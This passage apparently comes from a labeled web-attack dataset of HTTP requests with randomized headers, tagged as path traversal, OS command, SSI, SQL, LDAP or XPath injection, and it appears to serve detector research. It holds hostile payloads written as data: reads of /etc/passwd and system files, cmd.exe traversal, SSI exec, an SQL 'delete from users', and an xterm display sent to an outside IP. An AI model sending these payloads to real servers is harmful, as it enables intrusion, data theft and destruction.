MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest response="24bdDc9027Eaafbdb25b48aD0Bc2B85e"
Authorization: Basic Z25Bamk6aW8xcm5z
Range: 84-89,256260-35,5-
Referer: http://orli.uk/otoAnund/ghh0iaf/e2r4nu/axmSn.mdb
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.5 (X11; U; Open BSD i386 9.1; ay-9t; rv:1.6.6) Gecko/43939033
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 231x314
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38358
Start - Id: 46383
class: PathTransversal
GET /teR5kDRC5/tohSi/8adeiybh/twe/dDYpRz9E8xiiGCOff7Y/bYsi/M72c/rEduecl8o/82yenKVV/a7z/iaonsE3ttB/K-SLdM_U.gif?MorOuuerI=rlnoNunmjd%7Eee%2BEhwps&frcpUyAdO=ryMMLi&roouEseoetxoo=nrechodmiframe&JZdGlrn=hry%3BUaite&ntbitanstlvnt=zn6NdsucTel&iecagaolhtowet=srdu&udncnosibpns=dhoehYdRl+w&fett=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&p211TnetcatLmT=84613479&eaes=8ek%3De HTTP/1.1
Host: www.oIoU.it:2
Connection: keep-alive
Accept: audio/x-wav;q=0.3, video/mpeg, text/xml
Accept-Charset: iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=36
Client-ip: 230.204.6.13
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Sat, 22 Nov 08 23:20:57 CET
ETag: "pVa6OIfaXqG1XiR-"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Tue, 23 Feb 10 05:19:06 CET
If-Unmodified-Since: Thu, 30 Mar 06 13:44:17 CET
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: *
If-Range: *
Max-Forwards: 8922
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: hdes nflr9u=Tyswralt
Authorization: NTLM b3N2Y21yaFM3bnlsZmZzbGVpWU50aWVlaHJ1b2gwMWVJYTA=
Range: 2-1818,846125-
Referer: /o93tr/i11l/daAa7M/taeUd1/TseztAo.txt
TE: deflate
Trailer: Cache-Control
User-Agent: 0DS2XhRs6_ http://www.egoaeew.com
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
Transfer-Encoding: identity
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46383
Start - Id: 44021
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 154.0.18.237
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.8, compress, compress
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Sun, 26 Jul 09 23:35:50 GMT
ETag: W/"j_H3Ohbreby.0Yf"
Expect: 100-continue
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Mon, 16 Oct 06 20:31:09 CET
If-Match: *
If-None-Match: *
If-Range: "pIOhWw@_Wr1M5qY"
Max-Forwards: 936
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM aXNEZnNoaXNvYTBkZjFwdG5hc25xY2dBdGN0dGhzNE5ldWluZmxwTw==
Authorization: rpirso 5hnrkEa=t0ebst
Range: 67-764741,470518-20,3-202913
Referer: http://www.htadik.de/gttsr/kgtbhnz/tkok3t/eie3i.gif
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: rlMz6@Qcg http://www.ogi8Etb.fr
UA-CPU: PowerPC
UA-Disp: 675,1960,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: 7.1 145.91.23.104
Transfer-Encoding: identity
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44021
Start - Id: 40326
class: SSI
GET /khmet5ShheeybuoHh/H8wp-access_logT4OIhQAgOo@/arCirhLa354yN.cgi?uteiraDe=nyungauya&teoofi5oahAe=h9neiodcsgzaep&sndiaa=insertkand%24or96havingw0a&F9HW-hgEfL=gaeser9eabr&codda=354&dytum2nri8eah=%3C%21--+++++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5Csm%5Ce9ddfep%5Czieitged.exe+++d%3A%5Csouwret%5Cwww.tinaen.org%5Cr2ae%5Cdatabase.mdb++%2Fx+exporttofoxpro%22--%3E&1U9=45872433&QIMAA7Kxv@h=719917&atstnb=%2BsCy4&snuhugoilaeml=5581703&SE66hNVM=eavarq&brrsleii=3528127&JW5c=pr&esn=xG1C HTTP/1.1
Host: 44.89.77.162
Connection: tnaa
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 239.88.55.52
Cookie: rcSdiA0lq=(n?rraeSte;rmhomeY2Ph5VhavingCR=42832;lypiu=rY86x5
Cookie2: $Version="171"
Date: Thu, 19 May 05 07:00:31 GMT
ETag: "32_@SBUduCwDYWRv4fKP"
Expect: z0lexn8
From: 5sd2@aayBcy.de
If-Modified-Since: Fri, 25 Jan 08 23:31:17 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:10 GMT
If-Match: *
If-None-Match: *
If-Range: "uEH-ZYdFlT4d-sgDc"
Max-Forwards: 0923
MIME-Version: 0.0
Pragma: lyl='blecipf'
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Basic YWVlZDpBZG53
Range: -2115,0045-233,-51
Referer: http://www.1Tme.uk/sn0e/etidpNew.mpeg
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 6.5; la-3t; rv:6.7.6) Gecko/28500907
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: 9.5 www.amWanad.html, 2.0 31.197.128.187:7, eNtc/4.0 www.jthliiEh.htm
Transfer-Encoding: identity
Upgrade: aTEi/5.9
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 114.213.56.41
X-Serial-Number: 475557970524
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40326
Start - Id: 38920
class: LdapInjection
GET /rlfhisran5/inw9/Xol/e1huHye.shtml?hlIym4dncro=%3DkRheac2oe%28i&_perlpositionF5perlwgetcTnode=hwrer8n&aairrseriuw=mtm+an0tdropdhruu&s1neaEEotfoala=5xaLL&4spihsio=xHc2Lvcrr&aobennatae32o=%29++%28++%7C%28displayName%3Dhad*%29+%28name%3D++++had*+++%29%28+mail%3Dhad*++++%29 HTTP/1.0
Host: www.w1h7o9oq.st:80
Connection: keep-alive
Accept: audio/*, video/*, audio/*;q=0.5
Accept-Charset: ks_c_5601-1987;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: htm='3cKH'
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="625"
Date: Fri, 26 Mar 10 18:10:18 CET
ETag: "D3E_YyiAKOdMA4jb"
Expect: 100-continue
From: g0ftcpby@2esla.fr
If-Modified-Since: Wed, 17 Mar 04 03:26:15 UTC
If-Unmodified-Since: Thu, 17 Dec 09 07:46:10 GMT
If-Match: "NW.lywRVriUcM-xq7oWL"
If-None-Match: "mxpBaSZlNMBvj9Xhe8h@"
If-Range: Thu, 17 Sep 09 04:51:04 CET
Max-Forwards: 8
MIME-Version: 7.2
Pragma: v=uoE
Proxy-Authorization: i69e riaS=otzepawh
Authorization: ni6tio ogto9ix=ashae
Range: -80225,-8,-43269
Referer: /npiye/tnNRnwl/yeraAbdy/dgemuO.dll
TE: chunked;q=0.6,gzip;q=0.5
Trailer: Pragma
User-Agent: ioXSYwZvL http://www.yYmi.de
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/4.2 60.187.116.146:40
Transfer-Encoding: gzip
Upgrade: ktd/9.4, ytmtr/3.4, aSi3/3.1
Warning: 695 www.5pter.js "oYstrefhsreaowhenept" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38920
Start - Id: 36654
class: OsCommanding
GET /pSCIuqI3s7ez/aapml.css?eaawlotp=92.190.160.11+%7Cdir&itofto8atSErit=dee4imrdeiasc6la4&oSWNvbinSeQV7d=1664666&eou26cnoipme=6&whereK5E5FLSU=5caE-j1_S&exJsephd5uo=zej2x8ieRnhNo&hdSeydremlnnzoi=oZ8SVs&b0udiL=ca&rhnc9=xtU.-HUTR&mtci8bndraDiaoh=iOk&m2dz5eebnNnrds=ostyle%7C+&6DAi0a=saaIgbbiOvtUneinli&o12saettsseij=ratdepo&Y0gQopenqWO=tiahnxcvee&lsuiie8Kf=ngagnfNsratsrn HTTP/1.1
Host: 62.66.186.98
Connection: hgEohm1
Accept: text/html;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: identity, compress, deflate, gzip, identity;q=0.2
Accept-Language: 1ci7hen-9hoocat, g-npAtszh;q=0.7, nfl-kAe, IR-ze;q=0.6, oet-tnoe;q=0.6
Cache-Control: max-stale
Client-ip: 157.162.44.151
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Date: Sun, 26 Sep 04 02:05:34 UTC
Expect: foAfel
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-Unmodified-Since: Mon, 29 May 06 12:21:58 CET
If-Match: *
If-None-Match: "2cdUO98hyQW3@xV"
If-Range: Sun, 01 Mar 09 09:29:57 GMT
Max-Forwards: 702
MIME-Version: 8.5
Authorization: knwa2 hhrais7=2pEA
Range: -3,-137
Referer: /prpehiTs/mptel/i1ipiGa.bin
TE: deflate;q=0.0
Trailer: If-None-Match
User-Agent: lf8mrh9n6
UA-CPU: Sparc
UA-OS: Linux
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: gzip
Upgrade: nrtus/2.2, ncogn/8.3, yti/9.0
X-Forwarded-For: 193.167.35.201
X-Serial-Number: 96597
----: -----------------

null

End - Id: 36654
Start - Id: 35139
class: SqlInjection
POST /ererr1vtesei8ih/eIoeriVRKjN-l/lRmocha/ksUfMrfcEe/ek/4aR1vmcsaEosidhsr/iMXYdkeWC90MS6/r5MmQQzfVMR09BE7/re4hltoe8qcdeettd/dsouawteznioagO6hr.png? HTTP/1.1
Content-Length: 76
Content-Language: xr,snag
Content-Encoding: compress
Content-Location: /ppte7aN/easdn/ensni/eshfmh.html
Content-MD5: ZHJJYTZlc3NhbnNkcm83Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 20 Apr 08 09:06:50 UTC
Last-Modified: Sun, 21 Mar 10 08:51:33 CET
Host: www.Orrohau.cz:80
Connection: huog
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.5, gzip;q=0.3
Accept-Language: *;q=0.8
Cache-Control: min-fresh=5583
Client-ip: 104.27.173.11
Cookie: hChhqlwnfoeir2=ul;sJy=elnucoounionmoala;osnuneaR=et;8iws2r=cmdi;msAhroaysesot=toleiee
Cookie2: $Version="87"
Date: Sat, 17 Feb 07 23:24:10 CET
ETag: W/"98S_zUCS1aSpT_Sf"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Fri, 15 May 09 20:02:00 CET
If-Unmodified-Since: Mon, 12 Dec 05 09:48:43 UTC
If-Match: "fbrkAD_A5ucqvcDj@"
If-None-Match: "xAeDUQ3e7hTvFHvOCvd"
If-Range: Wed, 07 Jun 06 22:38:53 GMT
Max-Forwards: 239
MIME-Version: 5.3
Pragma: n1c9seu=tlnutttx
Proxy-Authorization: Digest username="e7tedn"
Authorization: Digest opaque="feure"
Range: 9644-,893-04607,798896-
Referer: /yospa/0asr.exe
TE: trailers,deflate
User-Agent: 2juorj9/2.2.2.3
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 8.8 224.44.123.243:71, FTP/8.7 www.1eneSh.tiff:23054, HTTP/0.3 55.31.51.74
Transfer-Encoding: gzip
Upgrade: masee/8.5, drdmb/5.6, asJ/9.9, oume2Y/4.6, pmsuya/8.2
X-Forwarded-For: 126.226.47.150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hljhlndireSexs=' ); delete from    users;  commit;  dummy(   '

End - Id: 35139
Start - Id: 38856
class: LdapInjection
GET /gItduCtmiecshb2/cSfaalWy.kBMeVz3Fi/cesoltehmsnthlQwe/5PV7N2BO/aAyt3hidE/fepeoeetie/rJM4Rp2KlC/ttneoDmouindsaqeof.asmx?fnihyDnm=%29+++%28+%7C++%28el%3Dzt1e0*%29 HTTP/1.1
Host: www.cdXisSbb.de
Connection: close
Accept: */*
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=54
Client-ip: 149.133.119.108
Cookie: athIggo=0;opIt2=sLsoa;ede=Bylnrcn8wser;mpokNesnmttt=79614918;ushtg=msUopassthru;siYy=u2og
Cookie2: $Version="7"
Date: Mon, 04 Apr 05 06:54:19 UTC
ETag: W/"@7Yjn8ZE2@SsNW_j"
Expect: beeepata=O503do;rmagetie
From: tdusret@b5koNnc.biz
If-Modified-Since: Fri, 03 Feb 06 05:37:28 GMT
If-Unmodified-Since: Wed, 23 Jan 08 14:07:09 UTC
If-Match: *
If-None-Match: "T4_zXOW8gGRpa2pA"
If-Range: "oG1PhwU3aqbAjCY"
Max-Forwards: 0679
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM Ym9pbk1uZWh0MnJzdXZsZXk1dXRETjdlZXlvdG50aEJlcXdzaWNtaWRYbnU=
Range: -909693
Referer: http://www.o5ogo.st/rtNem0c/vtqLeix/ghtl8/iSega2q/dfsarro.png
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.5 (compatible; vdasvn; Win98; 6ltox; asehlaselr)
UA-CPU: 68000
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 279x383
Via: 1.1 10.199.113.222
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38856
Start - Id: 38647
class: LdapInjection
GET /NCcatLdFe8ftmailY/hlowitzkesdcetr/m4XFYMW/idiegiideias/DzN.cgi?blau7ww=7901%29%28%26%28objectClass%3Dewtn%29%28%7C%28sn+++%3D++++9ot4%29%28cn%3Diot+J*%29%29&xE=1398&sg=AsebreYeinRca&auIo=MSe14 HTTP/1.0
Host: 213.198.86.59
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, gzip, gzip
Accept-Language: idHtR-eez;q=0.5, tOoOiMoT-hee1hheg
Cache-Control: no-transform
Client-ip: 48.249.181.128
Cookie: ttasthtxnnygpse=LotrhamxeaMoovnlo;7edsU=2347;prxtre0=698129;lVMV9qGPYcR=vn4fmo;HmWV=5376594;rrw=n
Cookie2: $Version="19"
Date: Sat, 12 Jun 04 20:38:37 CET
ETag: "9WmL6Zj2qJvQQYwY"
Expect: 100-continue
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Wed, 14 Nov 07 04:24:46 UTC
If-Unmodified-Since: Sat, 13 Aug 05 04:29:56 UTC
If-Match: "LbvFcuP1ok6DkRQN"
If-None-Match: *
If-Range: "HRH-EFb1dIpQwfhfR"
Max-Forwards: 07
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM ZXJBcHl0Y2RzZXVvdXBlWmRhbjd0cmp0dnRpNTFmTlJjcmV0aQ==
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /rmod/eels/ntRi/Ldca.jpeg
TE: deflate,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 3.0; ha-ke; rv:8.9.8) Gecko/84353264
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 6.3 www.Wet8imi.css, 1.0 www.uaUaEtC.css
Transfer-Encoding: wsNAGv; ageais=adtrsnio
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38647
Start - Id: 48340
class: XPathInjection
GET /d-I/TqdhtIoa/QyOAB201H@Ns/b2emNee/sezesR3i/eeclueo4rehte/asbnneoapzCbErs/ip8t9OotTadesloChda/gCDuUwVkRor.jpg?OlS93alaezdn=dAtcoe&heg=010&eospeasobaih=65158&XMorsQJSp4=textermByspiuee&ertellt=828&wSedn=500&2flsK67C=l8 HTTP/1.1
Host: www.nstdi.be
Connection: keep-alive
Accept-Charset: big5, iso-2022-jp, x-mac-hebrew;q=0.2
Accept-Encoding: compress;q=0.4, identity;q=0.3, deflate, gzip;q=0.9
Accept-Language: 3    or uglnw/ho/iot/child::node()[position()=577] or     90=
Cache-Control: max-age=68
Date: Sun, 02 Sep 07 18:45:06 CET
If-Unmodified-Since: Sun, 25 Apr 04 09:24:14 GMT
If-Range: *
Pragma: 9rxhnt=ijpobbao
Referer: http://ylhooiTa.ch/oecnma/rhizeh.nsf
User-Agent: eD@p1D http://www.7ntt.org

null

End - Id: 48340
Start - Id: 45340
class: PathTransversal
GET /raddWrnm4rlexnBx/8j/enRJlCf7hSl1gq4A.mspx?RHCc9HoG=slinkd&hedOaocIattga6=tgroup+bygl2oyirS&rnngEUuIetdss=9983702&lIia4Lennp=b&einAsalt=%29ym&bu=88 HTTP/1.0
Host: www.Bute.de
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: geuUheb-ilk;q=0.5, Ecol-fgRor6;q=0.3, to-0Atd3olo;q=0.3, Rip-a9sny;q=0.8, foshnEe-fec64;q=0.4
Cache-Control: no-transform
Client-ip: 69.236.118.249
Cookie: nrsHrmpbdagouf=ozseT0usesost;jformLperl3Sm8=s28gkYb.I;b5Ehr83a=376434;eAsbsi3atetljl=L:\windows\boot.ini
Date: Sat, 16 Jan 10 09:28:33 UTC
ETag: W/"BlLc.gxDQXGOVLncLrLM"
Expect: bovTEy=5dr6Lr;wsmnE
From: ttod@msoo.gov
If-Modified-Since: Thu, 22 May 08 15:25:12 CET
If-Unmodified-Since: Wed, 22 Mar 06 04:29:43 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 11 Aug 04 01:55:46 GMT
Max-Forwards: 84
MIME-Version: 1.8
Pragma: 9o8nenE6=tevnn
Proxy-Authorization: Basic Z3dFcmVicWo6aXRHM2FuZGM=
Authorization: Digest username="fiiwrzT"
Referer: http://falvHa.de/Dnl55r/bAuwD9ln/n0nas/i4Ynsnw6.aspx
TE: gzip;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 3.1; mg-3r; rv:2.4.6) Gecko/40072058
UA-CPU: 68000
UA-Disp: 3094,315,16
UA-Color: color32
UA-Pixels: 5890x6646
Via: FTP/5.1 219.30.3.183
Transfer-Encoding: identity
Upgrade: gfseoS/3.3, awe/2.6
Warning: 486 43.198.51.13 "nufOu9" 
X-Forwarded-For: 89.188.34.230

null

End - Id: 45340
Start - Id: 42995
class: OsCommanding
GET /ianubieqirfc95bi4/Ce0AQFIPLLUEp.tiff? HTTP/1.1
Host: 16.185.80.89
Connection: eof8r0q
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Language: *
Cache-Control: no-cache
Cookie: 2mTv=\rxterm    -display 86.113.112.143:0.0
Date: Sun, 20 Feb 05 24:12:21 CET
ETag: "r6fngJ0T@cwI9Q@_cYZ"
If-Range: Sat, 11 Jun 05 24:47:34 GMT
MIME-Version: 4.5
Range: 40373-9632,5696-,670189-
Referer: http://tirtet.st/arga6.avi
User-Agent: 4GsY._XQB http://www.wtcoe.st

null

End - Id: 42995
Start - Id: 46152
class: PathTransversal
GET /havings.sUshutdownU1wj9NE/gx5tsagrS19s6zeZe0r/bl1@sWphpZTOscriptHLA/egKryW.css?aihistOeIM8=52430&scriptAaccess_logK4bnph-pJd=udrope&rottnpihfwdii=5709&dndtwer1=rEarxterm&phiuFhhlbnset=9388235699&relXelni=%2Fetc%2Fpasswd&aL=384 HTTP/1.0
Host: 165.109.152.242
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: erxsns-ftmt1;q=0.7, NbCeoahl-u
Cache-Control: max-age=975
Client-ip: 172.17.95.67
Cookie: fWJEhfR86qE=18505;ei8oes=97195343;8oso63=327394;AtnFhaazu0a=p;etuNyfntsEeu=7UihN_WIjC
Cookie2: $Version="64"
Date: Wed, 01 Mar 06 04:40:10 UTC
ETag: W/"IjRyuTEU8gtrNwZt"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 06 Mar 04 24:36:20 CET
If-Unmodified-Since: Sun, 28 Nov 04 18:28:03 CET
If-Match: "T6doRXFCUyPO3O2jl"
If-None-Match: "hNb6KP3h5zyMdDN6"
If-Range: *
Max-Forwards: 526
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ogaE"
Range: 930922-
Referer: /9m8n9/eja6/hrejyiv/89mo.zip
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.8 (compatible; o9ntmdaei; Win 9x; mNlhdsr; jutr3en2as; roedHin)
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: thho
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 89.128.131.86
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46152
Start - Id: 40563
class: SSI
GET /has6pafiddtbWleso/xPxHz.sh?MFQrlinkArmt-zj=sN9SuA2&eEunionnuY2=060280972&ienduem=processing-instruction6wetteo5sI+it-&iwsid=%3C%21--+++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&z7lGK=1257246 HTTP/1.1
Host: 124.190.80.218
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, compress, gzip
Accept-Language: *
Cache-Control: ued='ideiaei'
Client-ip: 65.35.166.11
Cookie: Viuzh=pnlike> epr6rsT;4feaynhDkid=itna'form;oteskrtl3t2=241
Cookie2: $Version="29"
Date: Wed, 27 Aug 08 10:18:19 CET
ETag: "Mi8IDS@hpBaV6Zqy0"
Expect: Dmgzlepg=aTdpeoAa;8eizrast=eadti
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Mon, 08 Dec 08 03:36:13 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: *
If-None-Match: "hZipGUw1Hlf3lHMr8yC"
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 435
Pragma: A='o'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 488078-9765
Referer: /n7wlmee/oim9a/eaajbtjt/wq8smTs/leopa.gz
TE: chunked;q=0.6
Trailer: Pragma
User-Agent: hreetoayu (4kyCF8cY; rhi1Tuv-; fr43YSfwh)
UA-CPU: PowerPC
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.7 186.126.110.155, 3.0 204.172.153.35
Transfer-Encoding: gzip
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~

null

End - Id: 40563
Start - Id: 48717
class: XPathInjection
GET /IOxWempmYp8/hLssf5nawdo/Ilikeb/kM.A4/oYsv4vJ_xNkpk.jpeg?lformlocationlogT70aiKYP.=cdhun&io4tGfDaAOidsf=9t&GyT0u8perl=90&07eoeamurt=6513&farea=itVMb3MZ9iG&FJxB=oetnt%27++++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i++++%2B++++j++++%2B++k+%2B+l+%2B+1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++%27eenTL%27++%3D+%27++++iciqanis%27+or&lXqc=430&5et7sj=72&Yn0Ra=fnode&elwjxmas7EH7f=hmnwinntp%3E%3BEH%26c+rn&zetnSshisn9int=o HTTP/1.0
Host: www.d9e1M.org
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-9;q=0.4, iso-8859-15;q=0.4, iso-8859-2;q=0.7, iso-8859-8;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Client-ip: 38.215.80.1
Cookie: RTSd4inputtV5passthruy=1112717
Cookie2: $Version="7"
Date: Fri, 03 Jun 05 23:29:10 CET
Expect: 100-continue
From: nmen@jnnfeo.biz
If-Modified-Since: Wed, 24 Feb 10 05:17:23 CET
If-Unmodified-Since: Mon, 20 Oct 08 12:55:00 GMT
If-Match: "WNpIoKht@.qiWQL"
If-None-Match: *
If-Range: Sat, 02 Sep 06 16:23:57 CET
Max-Forwards: 4
Pragma: a2sw='soaurw'
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 98467-277,778-,061140-824755
Referer: /stg4/ntwattL/aUmP/Vnerxh/3ids.nsf
Trailer: Transfer-Encoding
User-Agent: cjzRorl (qxAoEUg_; bX-GiCC0; i2o6Bh7fcd; ovm9Yc)
UA-CPU: MIPS
Via: 8.4 www.pacmacwn.jpeg:36787
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48717
Start - Id: 39545
class: SSI
POST /sms0crtcg/iHkwVr/o2@ZLU.shtml? HTTP/1.0
Content-Length: 327
Content-Language: e
Content-Encoding: gzip
Content-Location: http://www.pcpax.gov/Demxqofq/a3ry/7dcei/nyiuHy/cssmQi.asmx
Content-MD5: ZW5jeXVhYWFsaXRzN3NoVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 07 Jan 06 12:10:21 CET
Last-Modified: Thu, 21 Sep 06 14:17:28 GMT
Host: 92.23.90.226
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-arabic, iso-8859-3
Accept-Encoding: compress, gzip, deflate;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 94.165.84.44
Cookie: f5eorjti=koz8;slTue=eyaohea;WA2BFJD@3vz=c8jhh;avgo4cjt1ecnsna= eprolinh?oa
Cookie2: $Version="21"
Date: Sun, 21 Mar 10 23:58:07 CET
ETag: "Fy7oJSR8Kvcmx6kiLh"
Expect: tkvh
From: nsnhcot@wollyC.st
If-Modified-Since: Tue, 27 Jan 09 12:01:10 UTC
